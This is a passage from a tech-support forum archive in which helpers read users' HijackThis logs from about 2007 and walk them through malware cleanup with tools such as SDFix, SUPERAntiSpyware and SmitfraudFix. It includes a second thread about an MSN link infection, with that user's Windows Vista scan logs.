O2 - BHO: (no name) - {D73F49B1-B51B-4d32-A3B7-BD04B8342F53} - C:\Program Files\MorpheusBar\SrchAstt\1.bin\MBSRCAS.DLL
O4 - HKLM\..\Run: [USRpdA] C:\WINDOWS\SYSTEM32\USRmlnkA.exe RunServices \Device\3cpipe-USRpdA
O4 - HKLM\..\Run: [PURE Networks Port Magic] "C:\PROGRA~1\PURENE~1\PORTMA~1\PortAOL.exe" -Run
O4 - HKLM\..\Run: [NeroFilterCheck] C:\Windows\system32\NeroCheck.exe
O4 - HKLM\..\Run: [InCD] C:\Program Files\Ahead\InCD\InCD.exe
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\qttask.exe" -atboottime
O4 - HKCU\..\Run: [ThePrivacyGuard] "C:\PROGRA~1\THEPRI~1\THEPRI~1.EXE" /startup
O4 - HKCU\..\Policies\Explorer\Run: [{1C62120B-07D0-1033-0428-031216200001}] "C:\Program Files\Common Files\{1C62120B-07D0-1033-0428-031216200001}\Update.exe" mc-110-12-0001232
O4 - HKUS\S-1-5-18\..\Run: [MySpaceIM] C:\Program Files\MySpace\IM\MySpaceIM.exe (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [MySpaceIM] C:\Program Files\MySpace\IM\MySpaceIM.exe (User 'Default user')
O8 - Extra context menu item: &AIM Search - res://C:\Program Files\AIM Toolbar\AIMBar.dll/aimsearch.htm
O8 - Extra context menu item: &AOL Toolbar search - res://C:\Program Files\AOL Toolbar\toolbar.dll/SEARCH.HTML
O8 - Extra context menu item: AdSubtract: Bypass Site - res://C:\Program Files\interMute\AdSubtract\AdSub.exe/360
O8 - Extra context menu item: AdSubtract: Cloak Image - res://C:\Program Files\interMute\AdSubtract\AdSub.exe/361
O8 - Extra context menu item: AdSubtract: Report Site - res://C:\Program Files\interMute\AdSubtract\AdSub.exe/359
O16 - DPF: {5D86DDB5-BDF9-441B-9E9E-D4730F4EE499} (BDSCANONLINE Control) - http://download.bitdefender.com/resources/scan8/oscan8.cab
O16 - DPF: {5ED80217-570B-4DA9-BF44-BE107C0EC166} (Windows Live Safety Center Base Module) - http://cdn.scan.safety.live.com/resource/download/scanner/wlscbase8460.cab
O16 - DPF: {B38870E4-7ECB-40DA-8C6A-595F0A5519FF} (MsnMessengerSetupDownloadControl Class) - http://messenger.msn.com/download/MsnMessengerSetupDownloader.cab
O16 - DPF: {B8BE5E93-A60C-4D26-A2DC-220313175592} (ZoneIntro Class) - http://zone.msn.com/binFramework/v10/ZIntro.cab34246.cab
O22 - SharedTaskScheduler: Browseui preloader - {438755C2-A8BA-11D1-B96B-00A0C90312E1} - C:\Windows\System32\browseui.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\Windows\System32\browseui.dll
O22 - SharedTaskScheduler: haeckel - {8373a2e0-bdd0-42bd-b4ec-ba5451eb6607} - C:\Windows\system32\moywh.dll
O23 - Service: AOL TopSpeed Monitor (AOL TopSpeedMonitor) - America Online, Inc - C:\Program Files\Common Files\AOL\TopSpeed\2.0\aoltsmon.exe
O23 - Service: FileZilla Server FTP server (FileZilla Server) - Unknown owner - C:\Documents and Settings\Administrator\Desktop\7.6 YurOTs\xampp\FileZillaFTP\FileZillaServer.exe (file MISSING)
O23 - Service: InstallDriver Table MANAGER (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe
O23 - Service: InCD Helper (InCDsrv) - Nero AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
O23 - Service: InCD Helper (read only) (InCDsrvR) - Nero AG - C:\Program Files\Ahead\InCD\InCDsrv.exe
O23 - Service: iPod Service (iPodService) - Apple Computer, Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: PC Tools Firewall Plus (PCToolsFirewallPlus) - Unknown owner - C:\Program Files\PC Tools Firewall Plus\FWService.exe
O23 - Service: Windows User Mode Driver Framework (UMWdf) - Unknown owner - C:\WINDOWS\System32\wdfmgr.exe (file missing)

--
End of file - 5344 bytes
Looking at the log, but first, why is your antivirus turned off?
There will be a few logs we need so please add them as attachments in the next post.

How to attach logs in a post

Save the log to somewhere you can easily find it. (usually the desktop)

To do this, from within the notepad go to the top of the page and select "File" > "Save As..." enter the file name and click "Save" Be sure the desktop is the location selected to save to.
Please save all files as Text Documents (.txt)

Posting the log

1. Below the text box click "Additional Options..."
* If REPLYING in a thread, before putting text into the reply box select "Preview"
2. Scroll down and select "Additional Options..."
3. Click "Browse"
4. Locate the file you want to attach and double click it to enter it into the window.
5. If you have more than one log click "(more attachments)" and a new window will open for adding another log.
* You will need to enter a message in the text box as well.


==========

Please read these carefully in order to save and post the logs we need.

==========

Download SDFix.exe and save it to your Desktop.

Double click SDFix.exe and it will extract the files to %systemdrive%
(Drive that contains the Windows Directory, typically C:\SDFix)

Please then reboot your computer in Safe Mode by doing the following :

  • Restart your computer
  • After hearing your computer beep once during startup, but before the Windows icon appears, tap the F8 key continually;
  • Instead of Windows loading as normal, the Advanced Options Menu should appear;
  • Select the first option, to run Windows in Safe Mode, then press Enter.
  • Choose your usual account.
  • Open the extracted SDFix folder and double click RunThis.bat to start the script.
  • Type Y to begin the cleanup process.
  • It will remove any Trojan Services and Registry Entries that it finds then prompt you to press any key to Reboot.
  • Press any Key and it will restart the PC.
  • When the PC restarts the Fixtool will run again and complete the removal process then display Finished, press any key to end the script and load your desktop icons.
  • Once the desktop icons load the SDFix report will open on screen and also save into the SDFix folder as Report.txt
    (Report.txt will also be copied to Clipboard).
  • Finally add the contents of the Report.txt in your next post as an Attachment

    ==========

    Download Superantispyware (SAS)

    SUPERAntispyware Free Edition

    Install it and double-click the icon on your desktop to run it.
    *  It will ask if you want to Update the program definitions, click Yes.
    *  Under Configuration and Preferences, click the Preferences button.
    *  Click the Scanning Control tab.
    *  Under Scanner Options make sure the following are checked:
    +  Close browsers before scanning
    +  Scan for tracking cookies
    +  Terminate memory threats before quarantining.
    +  Please leave the others unchecked.
    +  Click the Close button to leave the control center screen.
    *  On the main screen, under Scan for Harmful Software click Scan your computer.
    *  On the left check C:\Fixed Drive.
    *  On the right, under Complete Scan, choose Perform Complete Scan.
    *  Click Next to start the scan. Please be patient while it scans your computer.
    *  After the scan is complete a summary box will appear. Click OK.
    *  Make sure everything in the white box has a check next to it, then click Next.
    *  It will quarantine what it found and if it asks if you want to reboot, click Yes.
    *  To retrieve the removal information please do the following:
    +  After reboot, double-click the SUPERAntiSpyware icon on your desktop.
    +  Click Preferences. Click the Statistics/Logs tab.
    +  Under Scanner Logs, double-click SUPERAntiSpyware Scan Log.
    +  It will open in your default text editor (such as Notepad/Wordpad).
    +  Save the notepad file to your desktop by clicking (in notepad) "File" "Save As"
    * Save the log somewhere you can easily find it. (normally the desktop)
    *  Click close and close again to exit the program.
    *  Please add the log as an attachment in the next post.

    ==========

    You need to delete/UNINSTALL your copy of HijackThis (beta) and download the current version from here HijackThis.

    Please use the new version in future scans.

    Do a new HijackThis scan and add it as an attachment in the next post.

    ==========

    Attach these items in the next post
    SDFix Report.txt
    SUPERAntiSpyware log
    New HijackThis log


    Also let us know how things are now.
I dont have an Anti-virus...   

[saving disk space - old attachment deleted by admin]First lets get some antivirus protection on the computer.

Download and install Avast! 4 Home Edition Free

When you get done I will have some more instructions ready.Step 1
Complete this procedure completely including attaching the requested log before doing the second procedure.

Download SmitfraudFix (by S!Ri) to your Desktop.

Extract all the files to your Destop. A folder named SmitfraudFix will be created on your Desktop.

Open the SmitfraudFix folder and double-click smitfraudfix.cmd
Select option #1 - Search by typing 1 and press Enter
This program will scan large amounts of files on your computer for known patterns so please be patient while it works. When it is done, the results of the scan will be displayed and it will create a log named rapport.txt in the root of your drive, eg: Local Disk C: or partition where your operating system is installed. Please attach that log in your next reply.

Note: process.exe ( which is used my SmitFraudFIx ) is detected by some antivirus programs (AntiVir, Dr.Web, Kaspersky) as a "RiskTool"; it is not a virus, but a program used to stop system processes. Antivirus programs cannot distinguish between "good" and "malicious" use of such programs, therefore they may alert the user.
http://www.beyondlogic.org/consulting/processutil/processutil.htm
Alright did both.




[saving disk space - old attachment deleted by admin]Post a new HijackThis log please.

Also how is the computer now?


Well...The tray icon went away and such.

But my interent is messing up abit. Like it will slow down on loading or it won't load at all it just sits there loading...

I restart my computer and it will work. But i restarted my computer earlier and this thing poped up saying that a file hasn't closed yet...Press End Now or Close you know one of those things. The fille was called FFHook...Is that good or bad?





[saving disk space - old attachment deleted by admin]The FFHook.dll is related to firefox but not malicious as far as I know. I will look into it further...

The log isn't showing any malware but there some empty entries to fix.

Open HijackThis and select "Do a system scan only"

Place a check mark next to:

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Local Page =
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Local Page =
R3 - URLSearchHook: (no name) - {D73F49B6-B51B-4d32-A3B7-BD04B8342F53} - C:\Program Files\MorpheusBar\SrchAstt\1.bin\MBSRCAS.DLL (file missing)
O2 - BHO: (no name) - {D73F49B1-B51B-4d32-A3B7-BD04B8342F53} - C:\Program Files\MorpheusBar\SrchAstt\1.bin\MBSRCAS.DLL (file missing)


Close all windows and click "Fix checked"

I will look around and see if I can come up with anything on the FFHOOK.dll

Do you have the latest version of Firefox 2.0.0.9?

Also have you ran a virus scan with Avast! yet?

To learn more about how to protect yourself while on the internet read this article by Tony Klien: So how did I get infected in the first place? It mentions many free programs so it is worth a look.
yes i have 2.0.0.9

And yes I ran a scan with Avast...After I restarted my computer it ran and i also ran it after that.I suggest removing all traces of Firefox and reinstalling it fresh.

It is most likely an extension or add-on that is corrupt.

Use Mozbackup to backup any bookmarks, cookies or saved passwords. Just don't backup any extensions, you will need to add them back manually.

Mozbackup is simple to use and only takes a second to run. http://mozbackup.jasnapaka.com/download.php

To completely uninstall Firefox, then completely remove all traces of Firefox (save your bookmarks first):
1) Use Add/Remove Programs to uninstall Firefox
2) Delete the Mozilla/Firefox subdirectory in Program Files
3) Delete the Mozilla/Firefox subdirectory in your user profile
4) Reinstall Firefox
105.

Solve : msn click link virus?

Answer»

i have just accidently click the links in msn chat.. which link to a saved place..i saved it..but when the file has gone missing.

i try to scan virus in safe mode, but no virus was found. I use window vista defender, and nothing was found too. I have scan a hijecktjis log file in safe mode..

LOGFILE of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 9:10:24 AM, on 5/6/2007
Platform: Windows Vista  (WinNT 6.00.1904)
Boot mode: Safe mode

Running processes:
C:\Windows\Explorer.EXE
C:\Program Files\Grisoft\AVG7\avgwb.dat
C:\Users\YongShun\Desktop\HiJackThis_v2.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,AutoConfigURL = http://cache.np.edu.sg/proxy.pac
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Hosts: ::1 localhost
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: flashget urlcatch - {2F364306-AA45-47B5-9F9D-39A8B94E7EF7} - C:\Program Files\FlashGet\jccatch.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: FlashGet GetFlash Class - {F156768E-81EF-470C-9057-481BA8380DBA} - C:\Program Files\FlashGet\getflash.dll
O3 - Toolbar: (no name) - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - (no file)
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [TPFNF7] C:\Program Files\Lenovo\NPDIRECT\TPFNF7SP.exe /r
O4 - HKLM\..\Run: [PMHandler] C:\PROGRA~1\Lenovo\PMDRIV~1\PMHandler.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [TPWAUDAP] C:\Program Files\Lenovo\HOTKEY\TpWAudAp.exe
O4 - HKLM\..\Run: [snp2std] C:\Windows\vsnp2std.exe
O4 - HKLM\..\Run: [RtHDVCpl] RtHDVCpl.exe
O4 - HKLM\..\Run: [NvSvc] RUNDLL32.EXE C:\Windows\system32\nvsvc.dll,nvsvcStart
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\Windows\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [TVT Scheduler Proxy] C:\Program Files\Common Files\Lenovo\Scheduler\scheduler_proxy.exe
O4 - HKLM\..\Run: [LPManager] C:\PROGRA~1\Lenovo\LENOVO~2\LPMGR.exe
O4 - HKLM\..\Run: [AwaySch] C:\Program Files\Lenovo\AwayTask\AwaySch.EXE
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_01\bin\jusched.exe"
O4 - HKLM\..\Run: [OmniPass] C:\Program Files\Softex\OmniPass\scureapp.exe
O4 - HKLM\..\Run: [ACTray] C:\Program Files\ThinkPad\ConnectUtilities\ACTray.exe
O4 - HKLM\..\Run: [ACWLIcon] C:\Program Files\ThinkPad\ConnectUtilities\ACWLIcon.exe
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [Mouse Suite 98 Daemon] ICO.EXE
O4 - HKLM\..\Run: [PCSuiteTrayApplication] C:\Program Files\Nokia\Nokia PC Suite 6\LaunchApplication.exe -startup
O4 - HKLM\..\Run: [LenovoRegistration] C:\SWTOOLS\LenovoWelcome\LenovoRegistration.exe /inif="C:\SWSHARE\leadertech.ini"
O4 - HKLM\..\Run: [LenovoOobeOffers] c:\swtools\LenovoWelcome\LenovoOobeOffers.exe /filePath="c:\swshare\firstrun.txt"
O4 - HKLM\..\Run: [AMSG] C:\Program Files\ThinkVantage\AMSG\Amsg.exe /startup
O4 - HKLM\..\Run: [MSConfig] "C:\Windows\system32\msconfig.exe" /auto
O4 - HKCU\..\Run: [µTorrent] "C:\Users\YongShun\Desktop\utorrent.exe"
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'Default user')
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe
O4 - Global Startup: Adobe Reader Synchronizer.lnk = C:\Program Files\Adobe\Reader 8.0\Reader\AdobeCollabSync.exe
O8 - Extra context menu item: &Download All with FlashGet - C:\Program Files\FlashGet\jc_all.htm
O8 - Extra context menu item: &Download with FlashGet - C:\Program Files\FlashGet\jc_link.htm
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~1\Office12\EXCEL.EXE/3000
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun Java Console - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~1\Office12\REFIEBAR.DLL
O9 - Extra button: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\FlashGet.exe
O9 - Extra 'Tools' menuitem: FlashGet - {D6E814A0-E0C5-11d4-8D29-0050BA6940E3} - C:\Program Files\FlashGet\FlashGet.exe
O9 - Extra button: Run IMVU - {d9288080-1baa-4bc4-9cf8-a92d743db949} - C:\Users\YongShun\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IMVU\Run IMVU.lnk (file missing)
O13 - Gopher Prefix:
O16 - DPF: {20A60F0D-9AFA-4515-A0FD-83BD84642501} (Checkers Class) - http://messenger.zone.msn.com/binary/msgrchkr.cab56986.cab
O16 - DPF: {C3F79A2B-B9B4-4A66-B012-3EE46475B072} (MessengerStatsClient Class) - http://messenger.zone.msn.com/binary/MessengerStatsPAClient.cab56907.cab
O16 - DPF: {E008A543-CEFB-4559-912F-C27C2B89F13B} (Domino Web Access 7 Control) - https://npsdmail3.np.edu.sg/dwa7W.cab
O20 - Winlogon Notify: avgwlntf - C:\Windows\SYSTEM32\avgwlntf.dll
O22 - SharedTaskScheduler: Component Categories cache daemon - {8C7461EF-2B13-11d2-BE35-3078302C2030} - C:\Windows\system32\browseui.dll
O23 - Service: Ac Profile Manager Service (AcPrfMgrSvc) - Lenovo - C:\Program Files\ThinkPad\ConnectUtilities\AcPrfMgrSvc.exe
O23 - Service: Access Connections Main Service (AcSvc) - Lenovo - C:\Program Files\ThinkPad\ConnectUtilities\AcSvc.exe
O23 - Service: Agere Modem Call Progress Audio (AgereModemAudio) - Agere Systems - C:\Windows\system32\agrsmsvc.exe
O23 - Service: AVG7 Alert Manager Server (Avg7Alrt) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgamsvr.exe
O23 - Service: AVG7 Update Service (Avg7UpdSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgupsvc.exe
O23 - Service: AVG7 Resident Shield Service (AvgCoreSvc) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgrssvc.exe
O23 - Service: AVG E-mail Scanner (AVGEMS) - GRISOFT, s.r.o. - C:\PROGRA~1\Grisoft\AVG7\avgemc.exe
O23 - Service: Symantec Lic NetConnect service (CLTNetCnService) - Unknown owner - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe (file missing)
O23 - Service: Fn+F5 Service (FNF5SVC) - Lenovo. - C:\Program Files\LENOVO\HOTKEY\FNF5SVC.exe
O23 - Service: InstallDriver Table Manager (IDriverT) - Macrovision Corporation - C:\Program Files\Common Files\InstallShield\Driver\1150\Intel 32\IDriverT.exe
O23 - Service: IPS Core Service (IPSSVC) - Lenovo Group Limited - C:\Windows\system32\IPSSVC.EXE
O23 - Service: Softex OmniPass Service (omniserv) - Softex Inc. - C:\Program Files\Softex\OmniPass\OmniServ.exe
O23 - Service: PMSveH - Lenovo - C:\Program Files\Lenovo\PM Driver\PMSveH.exe
O23 - Service: ServiceLayer - Nokia. - C:\Program Files\PC Connectivity Solution\ServiceLayer.exe
O23 - Service: System Update (SUService) - Lenovo Group Limited - C:\Program Files\Lenovo\System Update\SUService.exe
O23 - Service: ThinkVantage Registry Monitor Service - Lenovo Group Limited - C:\Program Files\Common Files\Lenovo\tvt_reg_monitor_svc.exe
O23 - Service: On Screen Display (TPHKSVC) - Unknown owner - C:\Program Files\LENOVO\HOTKEY\TPHKSVC.exe
O23 - Service: TVT Backup Protection Service - Unknown owner - C:\Program Files\Lenovo\Rescue and Recovery\rrpservice.exe
O23 - Service: TVT Backup Service - Lenovo Group Limited - C:\Program Files\Lenovo\Rescue and Recovery\rrservice.exe
O23 - Service: TVT Scheduler - Lenovo Group Limited - c:\Program Files\Common Files\Lenovo\Scheduler\tvtsched.exe

--
End of file - 9186 bytes
what protections do you have??
anti-virus?? anti-malwarei use avg free anti-virus software, i didn't use any anti-spyware or malware software, i use window defender and also window firewall...ok look at my signature and dl the programs and run the scans in safe modeJeff, can you please post another, but this time in Normal Mode?  Not everything is shown in Safe Mode, so it's best that all HijackThis scans are done in Normal Mode.kk...i have INSTALL spybots search and destroy..and scan plus immunize. I have CleanUp software to help me clean temp files..
My hijackThis log file in normal mode

Logfile of Trend Micro HijackThis v2.0.0 (BETA)
Scan saved at 12:07:58 PM, on 6/6/2007
Platform: Windows Vista  (WinNT 6.00.1904)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Lenovo\NPDIRECT\tpfnf7sp.exe
C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
C:\Program Files\Lenovo\HOTKEY\TpWAudAp.exe
C:\Windows\vsnp2std.exe
C:\Windows\RtHDVCpl.exe
C:\Program Files\Common Files\Lenovo\Scheduler\scheduler_proxy.exe
C:\Program Files\Lenovo\LenovoCare\LPMGR.EXE
C:\Program Files\Lenovo\AwayTask\AwaySch.EXE
C:\Program Files\Java\jre1.6.0_01\bin\jusched.exe
C:\Program Files\Softex\OmniPass\scureapp.exe
C:\Program Files\ThinkPad\ConnectUtilities\ACTray.exe
C:\Program Files\ThinkPad\ConnectUtilities\ACWLIcon.exe
C:\Program Files\Grisoft\AVG7\avgcc.exe
C:\Windows\System32\ico.exe
C:\Program Files\Nokia\Nokia PC Suite 6\LaunchApplication.exe
C:\Program Files\ThinkVantage\AMSG\Amsg.exe
C:\Users\YongShun\Desktop\utorrent.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\Windows Media Player\wmplayer.exe
C:\Program Files\MSN Messenger\msnmsgr.exe
C:\Program Files\Opera 9\Opera.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Users\YongShun\Desktop\HiJackThis_v2.exe

R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant =
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch =
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,AutoConfigURL = http://cache.np.edu.sg/proxy.pac
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName =
O1 - Hosts: ::1 localhost
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: flashget urlcatch - {2F364306-AA45-47B5-9F9D-39A8B94E7EF7} - C:\Program Files\FlashGet\jccatch.dll
O2 - BHO: SSVHelper Class - {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} - C:\Program Files\Java\jre1.6.0_01\bin\ssv.dll
O2 - BHO: (no name) - {7E853D72-626A-48EC-A868-BA8D5E23E045} - (no file)
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: FlashGet GetFlash Class - {F156768E-81EF-470C-9057-481BA8380DBA} - C:\Program Files\FlashGet\getflash.dll
O3 - Toolbar: (no name) - {E0E899AB-F487-11D5-8D29-0050BA6940E3} - (no file)
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [TPFNF7] C:\Program Files\Lenovo\NPDIRECT\TPFNF7SP.exe /r
O4 - HKLM\..\Run: [PMHandler] C:\PROGRA~1\Lenovo\PMDRIV~1\PMHandler.exe
O4 - HKLM\..\Run: [SynTPEnh] C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
O4 - HKLM\..\Run: [TPWAUDAP] C:\Program Files\Lenovo\HOTKEY\TpWAudAp.exe
O4 - HKLM\..\Run: [snp2std] C:\Windows\vsnp2std.exe
O4 - HKLM\..\Run: [RtHDVCpl] RtHDVCpl.exe
O4 - HKLM\..\Run: [NvSvc] RUNDLL32.EXE C:\Windows\system32\nvsvc.dll,nvsvcStart
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\Windows\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [TVT Scheduler Proxy] C:\Program Files\Common Files\Lenovo\Scheduler\scheduler_proxy.exe
O4 - HKLM\..\Run: [LPManager] C:\PROGRA~1\Lenovo\LENOVO~2\LPMGR.exe
O4 - HKLM\..\Run: [AwaySch] C:\Program Files\Lenovo\AwayTask\AwaySch.EXE
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre1.6.0_01\bin\jusched.exe"
O4 - HKLM\..\Run: [OmniPass] C:\Program Files\Softex\OmniPass\scureapp.exe
O4 - HKLM\..\Run: [ACTray] C:\Program Files\ThinkPad\ConnectUtilities\ACTray.exe
O4 - HKLM\..\Run: [ACWLIcon] C:\Program Files\ThinkPad\ConnectUtilities\ACWLIcon.exe
O4 - HKLM\..\Run: [AVG7_CC] C:\PROGRA~1\Grisoft\AVG7\avgcc.exe /STARTUP
O4 - HKLM\..\Run: [Mouse Suite 98 Daemon] ICO.EXE
O4 - HKLM\..\Run: [PCSuiteTrayApplication] C:\Program Files\Nokia\Nokia PC Suite 6\LaunchApplication.exe -startup
O4 - HKLM\..\Run: [LenovoRegistration] C:\SWTOOLS\LenovoWelcome\LenovoRegistration.exe /inif="C:\SWSHARE\leadertech.ini"
O4 - HKLM\..\Run: [LenovoOobeOffers] c:\swtools\LenovoWelcome\LenovoOobeOffers.exe /filePath="c:\swshare\firstrun.txt"
O4 - HKLM\..\Run: [AMSG] C:\Program Files\ThinkVantage\AMSG\Amsg.exe /startup
O4 - HKLM\..\Run: [MSConfig] "C:\Windows\system32\msconfig.exe" /auto
O4 - HKCU\..\Run: [µTorrent] "C:\Users\YongShun\Desktop\utorrent.exe"
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
O4 - HKUS\S-1-5-18\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'SYSTEM')
O4 - HKUS\.DEFAULT\..\Run: [AVG7_Run] C:\PROGRA~1\Grisoft\AVG7\avgw.exe /RUNONCE (User 'Default user')
O4 - Global Startup: Adobe Reader Speed Launch.lnk = C:\Program Files\Adobe\Reader 8.0\Reader\reader_sl.exe
O4 - Global Startup: Adobe Reader Synchronizer.lnk = C:\Program Files\Adobe\Reader 8.0\Reader\AdobeCollabSync.exe
O8 - Extra context menu item: &Download All with FlashGet - C:\Program Files\FlashGet\jc_all.htm
O8 - Extra context menu item: &Download with FlashGet - C:\Program Files\FlashGet\jc_link.htm
